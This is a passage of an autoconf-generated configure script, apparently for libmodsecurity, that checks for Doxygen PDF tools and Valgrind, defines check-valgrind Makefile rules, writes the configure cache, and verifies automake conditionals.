as_fn_error $? "invalid value '$enableval' given to doxygen-pdf" "$LINENO" 5 ;; esac else DX_FLAG_pdf=0 test "$DX_FLAG_doc" = "1" || DX_FLAG_pdf=0 fi if test "$DX_FLAG_pdf" = 1; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}pdflatex", so it can be a program name with args. set dummy ${ac_tool_prefix}pdflatex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_PDFLATEX+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_PDFLATEX in [\\/]* | ?:[\\/]*) ac_cv_path_DX_PDFLATEX="$DX_PDFLATEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_PDFLATEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_PDFLATEX=$ac_cv_path_DX_PDFLATEX if test -n "$DX_PDFLATEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_PDFLATEX" >&5 $as_echo "$DX_PDFLATEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_PDFLATEX"; then ac_pt_DX_PDFLATEX=$DX_PDFLATEX # Extract the first word of "pdflatex", so it can be a program name with args. set dummy pdflatex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_PDFLATEX+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_PDFLATEX in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_PDFLATEX="$ac_pt_DX_PDFLATEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_PDFLATEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_PDFLATEX=$ac_cv_path_ac_pt_DX_PDFLATEX if test -n "$ac_pt_DX_PDFLATEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_PDFLATEX" >&5 $as_echo "$ac_pt_DX_PDFLATEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_PDFLATEX" = x; then DX_PDFLATEX="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_PDFLATEX=$ac_pt_DX_PDFLATEX fi else DX_PDFLATEX="$ac_cv_path_DX_PDFLATEX" fi if test "$DX_FLAG_pdf$DX_PDFLATEX" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: pdflatex not found - will not generate doxygen PDF documentation" >&5 $as_echo "$as_me: WARNING: pdflatex not found - will not generate doxygen PDF documentation" >&2;} DX_FLAG_pdf=0 fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}makeindex", so it can be a program name with args. set dummy ${ac_tool_prefix}makeindex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_MAKEINDEX+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_MAKEINDEX in [\\/]* | ?:[\\/]*) ac_cv_path_DX_MAKEINDEX="$DX_MAKEINDEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_MAKEINDEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_MAKEINDEX=$ac_cv_path_DX_MAKEINDEX if test -n "$DX_MAKEINDEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_MAKEINDEX" >&5 $as_echo "$DX_MAKEINDEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_MAKEINDEX"; then ac_pt_DX_MAKEINDEX=$DX_MAKEINDEX # Extract the first word of "makeindex", so it can be a program name with args. set dummy makeindex; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_MAKEINDEX+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_MAKEINDEX in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_MAKEINDEX="$ac_pt_DX_MAKEINDEX" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_MAKEINDEX="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_MAKEINDEX=$ac_cv_path_ac_pt_DX_MAKEINDEX if test -n "$ac_pt_DX_MAKEINDEX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_MAKEINDEX" >&5 $as_echo "$ac_pt_DX_MAKEINDEX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_MAKEINDEX" = x; then DX_MAKEINDEX="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_MAKEINDEX=$ac_pt_DX_MAKEINDEX fi else DX_MAKEINDEX="$ac_cv_path_DX_MAKEINDEX" fi if test "$DX_FLAG_pdf$DX_MAKEINDEX" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: makeindex not found - will not generate doxygen PDF documentation" >&5 $as_echo "$as_me: WARNING: makeindex not found - will not generate doxygen PDF documentation" >&2;} DX_FLAG_pdf=0 fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}egrep", so it can be a program name with args. set dummy ${ac_tool_prefix}egrep; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_DX_EGREP+:} false; then : $as_echo_n "(cached) " >&6 else case $DX_EGREP in [\\/]* | ?:[\\/]*) ac_cv_path_DX_EGREP="$DX_EGREP" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_DX_EGREP="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi DX_EGREP=$ac_cv_path_DX_EGREP if test -n "$DX_EGREP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DX_EGREP" >&5 $as_echo "$DX_EGREP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_path_DX_EGREP"; then ac_pt_DX_EGREP=$DX_EGREP # Extract the first word of "egrep", so it can be a program name with args. set dummy egrep; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_path_ac_pt_DX_EGREP+:} false; then : $as_echo_n "(cached) " >&6 else case $ac_pt_DX_EGREP in [\\/]* | ?:[\\/]*) ac_cv_path_ac_pt_DX_EGREP="$ac_pt_DX_EGREP" # Let the user override the test with a path. ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_path_ac_pt_DX_EGREP="$as_dir/$ac_word$ac_exec_ext" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS ;; esac fi ac_pt_DX_EGREP=$ac_cv_path_ac_pt_DX_EGREP if test -n "$ac_pt_DX_EGREP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_pt_DX_EGREP" >&5 $as_echo "$ac_pt_DX_EGREP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_pt_DX_EGREP" = x; then DX_EGREP="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DX_EGREP=$ac_pt_DX_EGREP fi else DX_EGREP="$ac_cv_path_DX_EGREP" fi if test "$DX_FLAG_pdf$DX_EGREP" = 1; then { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: egrep not found - will not generate doxygen PDF documentation" >&5 $as_echo "$as_me: WARNING: egrep not found - will not generate doxygen PDF documentation" >&2;} DX_FLAG_pdf=0 fi : fi if test "$DX_FLAG_pdf" = 1; then DX_COND_pdf_TRUE= DX_COND_pdf_FALSE='#' else DX_COND_pdf_TRUE='#' DX_COND_pdf_FALSE= fi if test "$DX_FLAG_pdf" = 1; then : else : fi # LaTeX generation for PS and/or PDF: if test "$DX_FLAG_ps" = 1 || test "$DX_FLAG_pdf" = 1; then DX_COND_latex_TRUE= DX_COND_latex_FALSE='#' else DX_COND_latex_TRUE='#' DX_COND_latex_FALSE= fi if test "$DX_FLAG_ps" = 1 || test "$DX_FLAG_pdf" = 1; then DX_ENV="$DX_ENV GENERATE_LATEX='YES'" else DX_ENV="$DX_ENV GENERATE_LATEX='NO'" fi # Paper size for PS and/or PDF: case "$DOXYGEN_PAPER_SIZE" in #( "") DOXYGEN_PAPER_SIZE="" ;; #( a4wide|a4|letter|legal|executive) DX_ENV="$DX_ENV PAPER_SIZE='$DOXYGEN_PAPER_SIZE'" ;; #( *) as_fn_error $? "unknown DOXYGEN_PAPER_SIZE='$DOXYGEN_PAPER_SIZE'" "$LINENO" 5 ;; esac #For debugging: #echo DX_FLAG_doc=$DX_FLAG_doc #echo DX_FLAG_dot=$DX_FLAG_dot #echo DX_FLAG_man=$DX_FLAG_man #echo DX_FLAG_html=$DX_FLAG_html #echo DX_FLAG_chm=$DX_FLAG_chm #echo DX_FLAG_chi=$DX_FLAG_chi #echo DX_FLAG_rtf=$DX_FLAG_rtf #echo DX_FLAG_xml=$DX_FLAG_xml #echo DX_FLAG_pdf=$DX_FLAG_pdf #echo DX_FLAG_ps=$DX_FLAG_ps #echo DX_ENV=$DX_ENV # make check-valgrind # Check whether --enable-valgrind was given. if test "${enable_valgrind+set}" = set; then : enableval=$enable_valgrind; enable_valgrind=$enableval else enable_valgrind= fi if test "$enable_valgrind" != "no"; then : # Check for Valgrind. # Extract the first word of "valgrind", so it can be a program name with args. set dummy valgrind; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_VALGRIND+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$VALGRIND"; then ac_cv_prog_VALGRIND="$VALGRIND" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_VALGRIND="valgrind" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi VALGRIND=$ac_cv_prog_VALGRIND if test -n "$VALGRIND"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $VALGRIND" >&5 $as_echo "$VALGRIND" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "$VALGRIND" = ""; then : if test "$enable_valgrind" = "yes"; then : as_fn_error $? "Could not find valgrind; either install it or reconfigure with --disable-valgrind" "$LINENO" 5 else enable_valgrind=no fi else enable_valgrind=yes fi fi if test "$enable_valgrind" = "yes"; then VALGRIND_ENABLED_TRUE= VALGRIND_ENABLED_FALSE='#' else VALGRIND_ENABLED_TRUE='#' VALGRIND_ENABLED_FALSE= fi VALGRIND_ENABLED=$enable_valgrind # Check for Valgrind tools we care about. valgrind_enabled_tools= # Check whether --enable-valgrind-memcheck was given. if test "${enable_valgrind_memcheck+set}" = set; then : enableval=$enable_valgrind_memcheck; enable_valgrind_memcheck=$enableval else enable_valgrind_memcheck= fi if test "$enable_valgrind" = "no"; then : enable_valgrind_memcheck=no elif test "$enable_valgrind_memcheck" != "no"; then : { $as_echo "$as_me:${as_lineno-$LINENO}: checking for Valgrind tool memcheck" >&5 $as_echo_n "checking for Valgrind tool memcheck... " >&6; } if ${ax_cv_valgrind_tool_memcheck+:} false; then : $as_echo_n "(cached) " >&6 else ax_cv_valgrind_tool_memcheck=no if `$VALGRIND --tool=memcheck --help >/dev/null 2>&1`; then : ax_cv_valgrind_tool_memcheck=yes fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ax_cv_valgrind_tool_memcheck" >&5 $as_echo "$ax_cv_valgrind_tool_memcheck" >&6; } if test "$ax_cv_valgrind_tool_memcheck" = "no"; then : if test "$enable_valgrind_memcheck" = "yes"; then : as_fn_error $? "Valgrind does not support memcheck; reconfigure with --disable-valgrind-memcheck" "$LINENO" 5 else enable_valgrind_memcheck=no fi else enable_valgrind_memcheck=yes fi fi if test "$enable_valgrind_memcheck" = "yes"; then : valgrind_enabled_tools="$valgrind_enabled_tools memcheck" fi ENABLE_VALGRIND_memcheck=$enable_valgrind_memcheck # Check whether --enable-valgrind-helgrind was given. if test "${enable_valgrind_helgrind+set}" = set; then : enableval=$enable_valgrind_helgrind; enable_valgrind_helgrind=$enableval else enable_valgrind_helgrind= fi if test "$enable_valgrind" = "no"; then : enable_valgrind_helgrind=no elif test "$enable_valgrind_helgrind" != "no"; then : { $as_echo "$as_me:${as_lineno-$LINENO}: checking for Valgrind tool helgrind" >&5 $as_echo_n "checking for Valgrind tool helgrind... " >&6; } if ${ax_cv_valgrind_tool_helgrind+:} false; then : $as_echo_n "(cached) " >&6 else ax_cv_valgrind_tool_helgrind=no if `$VALGRIND --tool=helgrind --help >/dev/null 2>&1`; then : ax_cv_valgrind_tool_helgrind=yes fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ax_cv_valgrind_tool_helgrind" >&5 $as_echo "$ax_cv_valgrind_tool_helgrind" >&6; } if test "$ax_cv_valgrind_tool_helgrind" = "no"; then : if test "$enable_valgrind_helgrind" = "yes"; then : as_fn_error $? "Valgrind does not support helgrind; reconfigure with --disable-valgrind-helgrind" "$LINENO" 5 else enable_valgrind_helgrind=no fi else enable_valgrind_helgrind=yes fi fi if test "$enable_valgrind_helgrind" = "yes"; then : valgrind_enabled_tools="$valgrind_enabled_tools helgrind" fi ENABLE_VALGRIND_helgrind=$enable_valgrind_helgrind # Check whether --enable-valgrind-drd was given. if test "${enable_valgrind_drd+set}" = set; then : enableval=$enable_valgrind_drd; enable_valgrind_drd=$enableval else enable_valgrind_drd= fi if test "$enable_valgrind" = "no"; then : enable_valgrind_drd=no elif test "$enable_valgrind_drd" != "no"; then : { $as_echo "$as_me:${as_lineno-$LINENO}: checking for Valgrind tool drd" >&5 $as_echo_n "checking for Valgrind tool drd... " >&6; } if ${ax_cv_valgrind_tool_drd+:} false; then : $as_echo_n "(cached) " >&6 else ax_cv_valgrind_tool_drd=no if `$VALGRIND --tool=drd --help >/dev/null 2>&1`; then : ax_cv_valgrind_tool_drd=yes fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ax_cv_valgrind_tool_drd" >&5 $as_echo "$ax_cv_valgrind_tool_drd" >&6; } if test "$ax_cv_valgrind_tool_drd" = "no"; then : if test "$enable_valgrind_drd" = "yes"; then : as_fn_error $? "Valgrind does not support drd; reconfigure with --disable-valgrind-drd" "$LINENO" 5 else enable_valgrind_drd=no fi else enable_valgrind_drd=yes fi fi if test "$enable_valgrind_drd" = "yes"; then : valgrind_enabled_tools="$valgrind_enabled_tools drd" fi ENABLE_VALGRIND_drd=$enable_valgrind_drd # Check whether --enable-valgrind-sgcheck was given. if test "${enable_valgrind_sgcheck+set}" = set; then : enableval=$enable_valgrind_sgcheck; enable_valgrind_sgcheck=$enableval else enable_valgrind_sgcheck= fi if test "$enable_valgrind" = "no"; then : enable_valgrind_sgcheck=no elif test "$enable_valgrind_sgcheck" = "yes"; then : { $as_echo "$as_me:${as_lineno-$LINENO}: checking for Valgrind tool sgcheck" >&5 $as_echo_n "checking for Valgrind tool sgcheck... " >&6; } if ${ax_cv_valgrind_tool_sgcheck+:} false; then : $as_echo_n "(cached) " >&6 else ax_cv_valgrind_tool_sgcheck=no if `$VALGRIND --tool=exp-sgcheck --help >/dev/null 2>&1`; then : ax_cv_valgrind_tool_sgcheck=yes fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ax_cv_valgrind_tool_sgcheck" >&5 $as_echo "$ax_cv_valgrind_tool_sgcheck" >&6; } if test "$ax_cv_valgrind_tool_sgcheck" = "no"; then : if test "$enable_valgrind_sgcheck" = "yes"; then : as_fn_error $? "Valgrind does not support sgcheck; reconfigure with --disable-valgrind-sgcheck" "$LINENO" 5 else enable_valgrind_sgcheck=no fi else enable_valgrind_sgcheck=yes fi fi if test "$enable_valgrind_sgcheck" = "yes"; then : valgrind_enabled_tools="$valgrind_enabled_tools sgcheck" fi ENABLE_VALGRIND_sgcheck=$enable_valgrind_sgcheck valgrind_tools="memcheck helgrind drd sgcheck" valgrind_enabled_tools=$valgrind_enabled_tools VALGRIND_CHECK_RULES=' # Valgrind check # # Optional: # - VALGRIND_SUPPRESSIONS_FILES: Space-separated list of Valgrind suppressions # files to load. (Default: empty) # - VALGRIND_FLAGS: General flags to pass to all Valgrind tools. # (Default: --num-callers=30) # - VALGRIND_$toolname_FLAGS: Flags to pass to Valgrind $toolname (one of: # memcheck, helgrind, drd, sgcheck). (Default: various) # Optional variables VALGRIND_SUPPRESSIONS ?= $(addprefix --suppressions=,$(VALGRIND_SUPPRESSIONS_FILES)) VALGRIND_FLAGS ?= --num-callers=30 VALGRIND_memcheck_FLAGS ?= --leak-check=full --show-reachable=no VALGRIND_helgrind_FLAGS ?= --history-level=approx VALGRIND_drd_FLAGS ?= VALGRIND_sgcheck_FLAGS ?= # Internal use valgrind_log_files = $(addprefix test-suite-,$(addsuffix .log,$(valgrind_tools))) valgrind_memcheck_flags = --tool=memcheck $(VALGRIND_memcheck_FLAGS) valgrind_helgrind_flags = --tool=helgrind $(VALGRIND_helgrind_FLAGS) valgrind_drd_flags = --tool=drd $(VALGRIND_drd_FLAGS) valgrind_sgcheck_flags = --tool=exp-sgcheck $(VALGRIND_sgcheck_FLAGS) valgrind_quiet = $(valgrind_quiet_$(V)) valgrind_quiet_ = $(valgrind_quiet_$(AM_DEFAULT_VERBOSITY)) valgrind_quiet_0 = --quiet valgrind_v_use = $(valgrind_v_use_$(V)) valgrind_v_use_ = $(valgrind_v_use_$(AM_DEFAULT_VERBOSITY)) valgrind_v_use_0 = @echo " USE " $(patsubst check-valgrind-%,%,$''@):; # Support running with and without libtool. ifneq ($(LIBTOOL),) valgrind_lt = $(LIBTOOL) $(AM_LIBTOOLFLAGS) $(LIBTOOLFLAGS) --mode=execute else valgrind_lt = endif # Use recursive makes in order to ignore errors during check check-valgrind: ifeq ($(VALGRIND_ENABLED),yes) -$(A''M_V_at)$(foreach tool,$(valgrind_enabled_tools), \ $(MAKE) $(AM_MAKEFLAGS) -k check-valgrind-$(tool); \ ) else @echo "Need to reconfigure with --enable-valgrind" endif # Valgrind running VALGRIND_TESTS_ENVIRONMENT = \ $(TESTS_ENVIRONMENT) \ env VALGRIND=$(VALGRIND) \ G_SLICE=always-malloc,debug-blocks \ G_DEBUG=fatal-warnings,fatal-criticals,gc-friendly VALGRIND_LOG_COMPILER = test/test-suite.sh $(VALGRIND_SUPPRESSIONS) $(VALGRIND_FLAGS) # $(valgrind_lt) \ # $(VALGRIND) $(VALGRIND_SUPPRESSIONS) --error-exitcode=1 $(VALGRIND_FLAGS) define valgrind_tool_rule = check-valgrind-$(1): ifeq ($$(VALGRIND_ENABLED)-$$(ENABLE_VALGRIND_$(1)),yes-yes) $$(valgrind_v_use)$$(MAKE) check-TESTS \ TESTS_ENVIRONMENT="$$(VALGRIND_TESTS_ENVIRONMENT)" \ LOG_COMPILER="$$(VALGRIND_LOG_COMPILER)" \ LOG_FLAGS="$$(valgrind_$(1)_flags)" \ TEST_SUITE_LOG=test-suite-$(1).log else ifeq ($$(VALGRIND_ENABLED),yes) @echo "Need to reconfigure with --enable-valgrind-$(1)" else @echo "Need to reconfigure with --enable-valgrind" endif endef $(foreach tool,$(valgrind_tools),$(eval $(call valgrind_tool_rule,$(tool)))) A''M_DISTCHECK_CONFIGURE_FLAGS ?= A''M_DISTCHECK_CONFIGURE_FLAGS += --disable-valgrind MOSTLYCLEANFILES ?= MOSTLYCLEANFILES += $(valgrind_log_files) .PHONY: check-valgrind $(add-prefix check-valgrind-,$(valgrind_tools)) ' # Generate the files. cat >confcache <<\_ACEOF # This file is a shell script that caches the results of configure # tests run on this system so they can be shared between configure # scripts and configure runs, see configure's option --config-cache. # It is not useful on other systems. If it contains results you don't # want to keep, you may remove or edit it. # # config.status only pays attention to the cache file if you give it # the --recheck option to rerun configure. # # `ac_cv_env_foo' variables (set or unset) will be overridden when # loading this file, other *unset* `ac_cv_foo' will be assigned the # following values. _ACEOF # The following way of writing the cache mishandles newlines in values, # but we know of no workaround that is simple, portable, and efficient. # So, we kill variables containing newlines. # Ultrix sh set writes to stderr and can't be redirected directly, # and sets the high bit in the cache file unless we assign to the vars. ( for ac_var in `(set) 2>&1 | sed -n 's/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'`; do eval ac_val=\$$ac_var case $ac_val in #( *${as_nl}*) case $ac_var in #( *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 $as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; esac case $ac_var in #( _ | IFS | as_nl) ;; #( BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( *) { eval $ac_var=; unset $ac_var;} ;; esac ;; esac done (set) 2>&1 | case $as_nl`(ac_space=' '; set) 2>&1` in #( *${as_nl}ac_space=\ *) # `set' does not quote correctly, so add quotes: double-quote # substitution turns \\\\ into \\, and sed turns \\ into \. sed -n \ "s/'/'\\\\''/g; s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\\2'/p" ;; #( *) # `set' quotes correctly as required by POSIX, so do not add quotes. sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" ;; esac | sort ) | sed ' /^ac_cv_env_/b end t clear :clear s/^\([^=]*\)=\(.*[{}].*\)$/test "${\1+set}" = set || &/ t end s/^\([^=]*\)=\(.*\)$/\1=${\1=\2}/ :end' >>confcache if diff "$cache_file" confcache >/dev/null 2>&1; then :; else if test -w "$cache_file"; then if test "x$cache_file" != "x/dev/null"; then { $as_echo "$as_me:${as_lineno-$LINENO}: updating cache $cache_file" >&5 $as_echo "$as_me: updating cache $cache_file" >&6;} if test ! -f "$cache_file" || test -h "$cache_file"; then cat confcache >"$cache_file" else case $cache_file in #( */* | ?:*) mv -f confcache "$cache_file"$$ && mv -f "$cache_file"$$ "$cache_file" ;; #( *) mv -f confcache "$cache_file" ;; esac fi fi else { $as_echo "$as_me:${as_lineno-$LINENO}: not updating unwritable cache $cache_file" >&5 $as_echo "$as_me: not updating unwritable cache $cache_file" >&6;} fi fi rm -f confcache test "x$prefix" = xNONE && prefix=$ac_default_prefix # Let make expand exec_prefix. test "x$exec_prefix" = xNONE && exec_prefix='${prefix}' DEFS=-DHAVE_CONFIG_H ac_libobjs= ac_ltlibobjs= U= for ac_i in : $LIBOBJS; do test "x$ac_i" = x: && continue # 1. Remove the extension, and $U if already installed. ac_script='s/\$U\././;s/\.o$//;s/\.obj$//' ac_i=`$as_echo "$ac_i" | sed "$ac_script"` # 2. Prepend LIBOBJDIR. When used with automake>=1.10 LIBOBJDIR # will be set to the directory where LIBOBJS objects are built. as_fn_append ac_libobjs " \${LIBOBJDIR}$ac_i\$U.$ac_objext" as_fn_append ac_ltlibobjs " \${LIBOBJDIR}$ac_i"'$U.lo' done LIBOBJS=$ac_libobjs LTLIBOBJS=$ac_ltlibobjs { $as_echo "$as_me:${as_lineno-$LINENO}: checking that generated files are newer than configure" >&5 $as_echo_n "checking that generated files are newer than configure... " >&6; } if test -n "$am_sleep_pid"; then # Hide warnings about reused PIDs. wait $am_sleep_pid 2>/dev/null fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: done" >&5 $as_echo "done" >&6; } if test -n "$EXEEXT"; then am__EXEEXT_TRUE= am__EXEEXT_FALSE='#' else am__EXEEXT_TRUE='#' am__EXEEXT_FALSE= fi if test -z "${AMDEP_TRUE}" && test -z "${AMDEP_FALSE}"; then as_fn_error $? "conditional \"AMDEP\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${am__fastdepCXX_TRUE}" && test -z "${am__fastdepCXX_FALSE}"; then as_fn_error $? "conditional \"am__fastdepCXX\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${am__fastdepCC_TRUE}" && test -z "${am__fastdepCC_FALSE}"; then as_fn_error $? "conditional \"am__fastdepCC\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${YAJL_VERSION_TRUE}" && test -z "${YAJL_VERSION_FALSE}"; then as_fn_error $? "conditional \"YAJL_VERSION\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${GEOIP_CFLAGS_TRUE}" && test -z "${GEOIP_CFLAGS_FALSE}"; then as_fn_error $? "conditional \"GEOIP_CFLAGS\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${MAXMIND_CFLAGS_TRUE}" && test -z "${MAXMIND_CFLAGS_FALSE}"; then as_fn_error $? "conditional \"MAXMIND_CFLAGS\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${LMDB_CFLAGS_TRUE}" && test -z "${LMDB_CFLAGS_FALSE}"; then as_fn_error $? "conditional \"LMDB_CFLAGS\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${SSDEEP_CFLAGS_TRUE}" && test -z "${SSDEEP_CFLAGS_FALSE}"; then as_fn_error $? "conditional \"SSDEEP_CFLAGS\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${LUA_CFLAGS_TRUE}" && test -z "${LUA_CFLAGS_FALSE}"; then as_fn_error $? "conditional \"LUA_CFLAGS\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${TEST_UTILITIES_TRUE}" && test -z "${TEST_UTILITIES_FALSE}"; then as_fn_error $? "conditional \"TEST_UTILITIES\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${EXAMPLES_TRUE}" && test -z "${EXAMPLES_FALSE}"; then as_fn_error $? "conditional \"EXAMPLES\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${BUILD_PARSER_TRUE}" && test -z "${BUILD_PARSER_FALSE}"; then as_fn_error $? "conditional \"BUILD_PARSER\" was never defined. Usually this means the macro was only invoked conditionally." "$LINENO" 5 fi if test -z "${USE_MUTEX_ON_PM_TRUE}" && test -z 